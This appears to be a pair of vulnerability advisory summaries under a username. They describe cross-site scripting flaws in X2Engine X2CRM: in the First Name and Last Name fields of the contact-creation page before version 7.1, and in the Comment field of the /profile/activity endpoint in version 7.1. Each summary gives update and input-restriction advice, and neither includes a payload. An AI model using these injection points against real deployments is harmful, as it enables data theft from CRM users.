Hades484

Name of the Vulnerable Software and Affected Versions: X2engine X2CRM versions prior to 7.1 Description: The issue allows remote attackers to obtain sensitive information by injecting arbitrary web script or HTML via the `First Name` and `Last Name` fields in the "/index.php/contacts/create" page. This is a Cross Site Scripting (XSS) issue. Recommendations: For versions prior to 7.1, update to a version that contains a fix for this issue to prevent exploitation. As a temporary workaround, consider restricting input for the `First Name` and `Last Name` fields to minimize the risk of arbitrary script injection.

**Name of the Vulnerable Software and Affected Versions** X2Engine X2CRM version 7.1 **Description** The issue allows remote attackers to obtain sensitive information by injecting arbitrary web script or HTML via the `Comment` field in the "/profile/activity" API endpoint. This can lead to the disclosure of sensitive data. **Recommendations** For version 7.1, update the software to a version that includes a fix for this issue, or as a temporary workaround, consider restricting access to the "/profile/activity" page to minimize the risk of exploitation. Avoid using the `Comment` field in the affected page until the issue is resolved.